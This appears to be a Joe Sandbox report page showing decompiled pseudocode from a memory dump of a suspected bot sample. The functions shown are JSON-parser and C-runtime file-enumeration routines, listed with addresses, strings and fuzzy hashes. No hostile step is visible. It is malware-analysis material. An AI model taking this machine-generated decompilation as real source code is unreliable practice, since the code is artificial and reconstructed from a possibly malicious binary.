							 *((intOrPtr*)(_t340 - 0x1a4)) = E0041AF80( *((intOrPtr*)(_t340 - 4)) + 0x250);
							 *((intOrPtr*)(_t340 - 0x1a8))( *((intOrPtr*)(_t340 - 0x1a4)),  *((intOrPtr*)(_t340 - 0x14)));
							E0041CFC0(_t230,  *((intOrPtr*)(_t340 - 4)), _t338, _t339, E00417420(_t340 - 0x20), 1,  *(_t340 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t340 + 0x14)),  *((intOrPtr*)(_t340 - 0x14)));
							 *((intOrPtr*)(_t340 - 0x90)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
							 *((intOrPtr*)(_t340 - 0x1ac)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x90)))) + 4));
							 *((intOrPtr*)(_t340 - 0x1ac))(0x44127c, 2);
							E00417700(_t340 - 0x20);
						}
						__eflags = E0041ED90( *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8))) & 0x000000ff;
						if(__eflags != 0) {
							_push(0x3f90);
							E00430DB7(_t230, _t326, _t338, _t339, __eflags, L"!val.m_value.array->empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
						}
						 *((intOrPtr*)(_t340 - 0x94)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1b4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x94)))) + 4));
						 *((intOrPtr*)(_t340 - 0x1b0)) = E0041AF80( *((intOrPtr*)(_t340 - 4)) + 0x250);
						 *((intOrPtr*)(_t340 - 0x1b4))( *((intOrPtr*)(_t340 - 0x1b0)),  *((intOrPtr*)(_t340 - 0x14)));
						E0041CFC0(_t230,  *((intOrPtr*)(_t340 - 4)), _t338, _t339, E0041AC90( *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8))), 1,  *(_t340 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t340 + 0x14)),  *((intOrPtr*)(_t340 - 0x14)));
						 *((intOrPtr*)(_t340 - 0x98)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1b8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x98))))));
						 *((intOrPtr*)(_t340 - 0x1b8))(0xa);
						 *((intOrPtr*)(_t340 - 0x9c)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1c0)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x9c)))) + 4));
						 *((intOrPtr*)(_t340 - 0x1bc)) = E0041AF80( *((intOrPtr*)(_t340 - 4)) + 0x250);
						 *((intOrPtr*)(_t340 - 0x1c0))( *((intOrPtr*)(_t340 - 0x1bc)),  *((intOrPtr*)(_t340 + 0x18)));
						 *((intOrPtr*)(_t340 - 0xa0)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1c4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0xa0))))));
						_t171 =  *((intOrPtr*)(_t340 - 0x1c4))(0x5d);
					}
				} else {
					 *((intOrPtr*)(_t340 - 0x84)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
					 *((intOrPtr*)(_t340 - 0x18c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x84)))) + 4));
					_t171 =  *((intOrPtr*)(_t340 - 0x18c))("[]", 2);
				}
				return _t171;
			}

0x0041d66a
0x0041d66a
0x0041d66a
0x0041d67a
0x0041d6b7
0x0041d6b9
0x0041d991
0x0041d9a1
0x0041d9af
0x0041d9bb
0x0041d9cb
0x0041d9da
0x0041d9e0
0x0041d9f8
0x0041da16
0x0041da1e
0x0041da20
0x00000000
0x00000000
0x0041da3d
0x0041da4a
0x0041da5a
0x0041da68
0x0041d9d5
0x0041d9d5
0x0041da79
0x0041da7e
0x0041da81
0x0041da83
0x0041da85
0x0041da94
0x0041da99
0x0041daba
0x0041dac7
0x0041dad7
0x0041dae5
0x0041d6bf
0x0041d6c7
0x0041d6d8
0x0041d6eb
0x0041d6f7
0x0041d703
0x0041d708
0x0041d70b
0x0041d716
0x0041d72c
0x0041d735
0x0041d735
0x0041d740
0x0041d750
0x0041d75f
0x0041d765
0x0041d77d
0x0041d785
0x0041d79b
0x0041d7a3
0x0041d7a5
0x00000000
0x00000000
0x0041d7b3
0x0041d7c4
0x0041d7d8
0x0041d7ef
0x0041d810
0x0041d81d
0x0041d82e
0x0041d841
0x0041d75a
0x0041d75a
0x0041d85a
0x0041d85c
0x0041d85e
0x0041d86d
0x0041d872
0x0041d87d
0x0041d88e
0x0041d8a2
0x0041d8b9
0x0041d8dd
0x0041d8ea
0x0041d8fa
0x0041d908
0x0041d916
0x0041d927
0x0041d93b
0x0041d952
0x0041d960
0x0041d970
0x0041d97e
0x0041d97e
0x0041d67c
0x0041d684
0x0041d695
0x0041d6a8
0x0041d6a8
0x0041e219

APIs

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0041D79B

Strings

!val.m_value.array->empty(), xrefs: 0041D868, 0041DA8F
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0041D863, 0041DA8A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Affinity::operator!=Concurrency::details::Hardware
String ID: !val.m_value.array->empty()$C:\Users\root\Desktop\bot v2\json.hpp
API String ID: 264382594-2567969186
Opcode ID: 0ead811841e71aa06aa14400f117f732eadabe5e319ffc3c44e37c536d871d6c
Instruction ID: b87e7754a08b246c2bd9c4ca0310b9e8433c64fda425b550ae2d6990dc36d800
Opcode Fuzzy Hash: 0ead811841e71aa06aa14400f117f732eadabe5e319ffc3c44e37c536d871d6c
Instruction Fuzzy Hash: 45D1F674A002189FDB18DF55CD91BEEB7B1AF89304F1080DAE50AAB391DB346E81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00436294 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00436294(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E004313DB(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E0043BE11(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E004292BC();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00436150(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E0043BE11(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E004367C7(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00432BD6(_t300);
														_t302 = _v12;
													}
													E00432BD6(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E0043BE11(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E004292BC();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x4c61a4; // 0x8656a166
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0043BE60(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E0042D76C(_t244 - _t287 + 1, _t287,  &_v676, E0042D789(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E004361C5( &(_v608.cFileName),  &_v640,  &_v609, E0042D789(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00432BD6(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00432BD6(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E0043B870(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E004361AD);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00432BD6(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E00424900(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00432BD6(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0043BE20(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00432BD6( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00432BD6(_t283);
						goto L31;
					}
				} else {
					_t219 = E00429369(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E0042928F();
					L31:
					return _t297;
				}
				L81:
			}

0x00436299
0x0043629c
0x0043629f
0x004362a0
0x004362a2
0x004362b8
0x004362bc
0x004362bf
0x004362c1
0x004362c3
0x004362c5
0x004362c7
0x004362ca
0x004362cd
0x004362d0
0x004362d2
0x00436335
0x00436337
0x0043633a
0x0043633c
0x00436340
0x00436349
0x0043634a
0x0043634d
0x0043634f
0x00436352
0x00436356
0x00436356
0x00436358
0x0043635a
0x0043635c
0x0043635e
0x0043635e
0x00436360
0x00436363
0x00436366
0x00436366
0x00436368
0x00436369
0x00436369
0x00436374
0x00436376
0x00436379
0x0043637a
0x0043637d
0x0043637d
0x00436381
0x00436384
0x00436387
0x00436387
0x00436387
0x00436394
0x00436396
0x00436399
0x0043639b
0x004363b3
0x004363b6
0x004363b9
0x004363bb
0x004363be
0x004363c0
0x004363c3
0x004363c6
0x00436423
0x00436426
0x00436429
0x0043642b
0x00000000
0x004363c8
0x004363ca
0x004363ca
0x004363cc
0x004363cf
0x004363cf
0x004363d1
0x004363d3
0x004363d9
0x004363dc
0x004363dc
0x004363de
0x004363df
0x004363df
0x004363e6
0x004363e9
0x004363ed
0x004363fa
0x004363ff
0x00436402
0x00436404
0x00436478
0x00436479
0x0043647a
0x0043647b
0x0043647c
0x0043647d
0x00436482
0x00436486
0x00436488
0x00436489
0x0043648c
0x0043648c
0x0043648f
0x0043648f
0x00436491
0x00436492
0x00436492
0x00436496
0x00436497
0x0043649e
0x004364a1
0x004364a4
0x004364a6
0x004364ae
0x004364af
0x004364b0
0x004364b3
0x004364bd
0x004364c1
0x004364c3
0x004364d7
0x004364d7
0x004364da
0x004364e4
0x004364e9
0x004364ec
0x004364ee
0x00000000
0x004364f0
0x004364f0
0x004364f5
0x004364fc
0x004364ff
0x00436501
0x00436512
0x00436514
0x00436516
0x00436516
0x00436516
0x00436503
0x00436504
0x00436509
0x0043650c
0x0043651b
0x00436521
0x00000000
0x00436524
0x004364c5
0x004364c5
0x004364cb
0x004364d0
0x004364d3
0x004364d5
0x00436527
0x00436529
0x0043652a
0x0043652b
0x0043652c
0x0043652d
0x0043652e
0x00436533
0x00436536
0x00436537
0x00436539
0x0043653f
0x00436546
0x00436549
0x0043654c
0x0043654f
0x00436550
0x00436551
0x00436554
0x0043655a
0x0043655c
0x0043655e
0x0043655e
0x00436560
0x00436562
0x00000000
0x00000000
0x00436564
0x00436566
0x00436568
0x0043656a
0x00436575
0x00436577
0x00436579
0x00000000
0x00000000
0x00436579
0x0043656a
0x00000000
0x00436566
0x0043657b
0x0043657b
0x00436581
0x00436583
0x00436589
0x0043658b
0x004365ad
0x004365ad
0x004365af
0x004365b1
0x004365bd
0x004365bd
0x004365b3
0x004365b3
0x004365b5
0x00000000
0x004365b7
0x004365b7
0x004365b9
0x004365bb
0x00000000
0x00000000
0x004365bb
0x004365b5
0x004365c5
0x004365cd
0x004365d3
0x004365d4
0x004365d6
0x004365de
0x004365e4
0x004365ea
0x004365f0
0x00436604
0x00436609
0x00436614
0x00436624
0x0043662a
0x0043662c
0x0043662f
0x00436652
0x00436652
0x00436657
0x0043665d
0x0043665d
0x00436663
0x00436669
0x0043666f
0x00436675
0x0043667b
0x0043669c
0x004366a1
0x004366a6
0x004366aa
0x004366b0
0x004366b3
0x004366c6
0x004366c6
0x004366cc
0x004366d2
0x004366d3
0x004366d4
0x004366d9
0x004366dc
0x004366e2
0x004366e4
0x00436742
0x00436748
0x00436750
0x00436755
0x0043675b
0x0043675c
0x00000000
0x00000000
0x00000000
0x004366b5
0x004366b5
0x004366b8
0x004366ba
0x00000000
0x004366bc
0x004366bc
0x004366bf
0x00000000
0x004366c1
0x004366c1
0x004366c4
0x00000000
0x00000000
0x00000000
0x00000000
0x004366c4
0x004366bf
0x004366ba
0x0043675e
0x0043675f
0x00000000
0x004366e6
0x004366e6
0x004366ec
0x004366f4
0x004366f9
0x00436708
0x00436708
0x00436710
0x00436716
0x0043671c
0x00436723
0x00436726
0x00436728
0x00436738
0x0043673d
0x00000000
0x00436631
0x00436631
0x00436637
0x00436638
0x00436639
0x0043663a
0x00436642
0x00436642
0x00436765
0x00436765
0x0043676c
0x0043676d
0x00436775
0x0043677a
0x0043677b
0x0043658d
0x0043658d
0x00436590
0x00436592
0x004365a7
0x00000000
0x00436594
0x00436594
0x00436597
0x00436598
0x00436599
0x0043659a
0x0043659f
0x00436592
0x00436780
0x00436781
0x00436783
0x0043678a
0x00000000
0x00000000
0x00000000
0x004364d5
0x004364a8
0x004364aa
0x004364ab
0x004364ad
0x004364ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00436406
0x00436406
0x0043640c
0x0043640f
0x00436412
0x00436415
0x00436418
0x0043641b
0x0043641e
0x0043641e
0x00000000
0x004363cf
0x0043639d
0x0043639d
0x004363a0
0x0043642d
0x0043642e
0x00436433
0x00000000
0x00436433
0x004362d4
0x004362d4
0x004362d7
0x004362df
0x004362e2
0x004362e9
0x004362eb
0x004362ed
0x00436308
0x00436309
0x0043630a
0x0043630b
0x00436310
0x00436313
0x00436316
0x004362ef
0x004362ef
0x004362f2
0x004362f3
0x004362f4
0x004362f5
0x004362f6
0x004362fb
0x004362fd
0x00436300
0x00436300
0x00436318
0x0043631a
0x00000000
0x00000000
0x00436323
0x00436326
0x00436329
0x0043632b
0x0043632d
0x00000000
0x0043632f
0x0043632f
0x00436332
0x00000000
0x00436332
0x00000000
0x0043632d
0x004363a8
0x00436434
0x00436437
0x0043643b
0x00436444
0x00436447
0x0043644b
0x0043644b
0x0043644d
0x00436450
0x00436452
0x00436454
0x00436456
0x0043645b
0x0043645c
0x00436460
0x00436460
0x00436464
0x00436467
0x00436467
0x0043646b
0x00000000
0x00436472
0x004362a4
0x004362a4
0x004362ab
0x004362ac
0x004362ae
0x00436473
0x00436477
0x00436477
0x00000000

APIs

_free.LIBCMT ref: 0043642E

Strings

*?, xrefs: 004362D7

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0d58ab87c428b1ed075bceae3cb68af01e56792281c454fbbb1f001b1ad8aff0
Instruction ID: 287496332bd460b3ad4d47e230c4948a9c1605e50fb8298b066e1ad4ba362959
Opcode Fuzzy Hash: 0d58ab87c428b1ed075bceae3cb68af01e56792281c454fbbb1f001b1ad8aff0
Instruction Fuzzy Hash: 47616D75E0021AAFCB14DFA9C8815EEFBF5EF4C310F25916AE814E7340D679AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F190 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041F190(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v64;
				char _v80;
				intOrPtr* _t38;
				signed char _t39;
				signed char _t41;
				intOrPtr* _t52;
				signed char _t57;
				void* _t78;
				void* _t135;
				void* _t136;
				void* _t137;

				_t136 = __esi;
				_t135 = __edi;
				_t78 = __ebx;
				_v8 = __ecx;
				_t38 = E0041AC60(_v8 + 4);
				_t140 =  *_t38;
				if( *_t38 != 0) {
					_v20 = _v8 + 0x38;
					_v12 =  *((intOrPtr*)(E0041AC60(_v8 + 4)));
					_v16 = E00423F60(_v8 + 4) - 1;
					_t128 = _v12;
					if((E00417DC0(_v20, _t140, _v16, 1, _v12) & 0x000000ff) != 0) {
						__eflags = _v8 + 4;
						E00416AC0(E0041AC60(_v8 + 4),  *_t73);
					} else {
						_t137 = _t137 - 0x10;
						_t128 = _v8 + 0x68;
						E00414FD0(_t137, _v8 + 0x68);
						E00416EA0( *((intOrPtr*)(E0041AC60(_v8 + 4))));
					}
				}
				_t39 = E0041ED90(_v8 + 4);
				_t142 = _t39 & 0x000000ff;
				if((_t39 & 0x000000ff) != 0) {
					_push(0x1814);
					E00430DB7(_t78, _t128, _t135, _t136, _t142, L"!ref_stack.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t137 = _t137 + 0xc;
				}
				_t41 = E0041EDD0(_v8 + 0x10);
				_t129 = _t41 & 0x000000ff;
				_t143 = _t41 & 0x000000ff;
				if((_t41 & 0x000000ff) != 0) {
					_push(0x1815);
					E00430DB7(_t78, _t129, _t135, _t136, _t143, L"!keep_stack.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t137 = _t137 + 0xc;
				}
				E00421C90(_v8 + 4);
				E00421D70(_v8 + 0x10, _t143);
				if((E0041ED90(_v8 + 4) & 0x000000ff) == 0 &&  *((intOrPtr*)(E0041AC60(_v8 + 4))) != 0 && (E00420D20( *((intOrPtr*)(E0041AC60(_v8 + 4)))) & 0x000000ff) != 0) {
					_v24 =  *((intOrPtr*)(E0041AC60(_v8 + 4)));
					E0041ADA0(_t78, _v24, _t135, _t136,  &_v48);
					while(1) {
						_t52 = E0041AC60(_v8 + 4);
						_t131 =  *_t52;
						_v28 =  *_t52;
						if((E004060C0( &_v48, E0041EE60(_t78, _v28, _t135, _t136,  &_v64)) & 0x000000ff) == 0) {
							goto L17;
						}
						_t57 = E00420C20(E00417470(_t78,  &_v48, _t131, _t135, _t136));
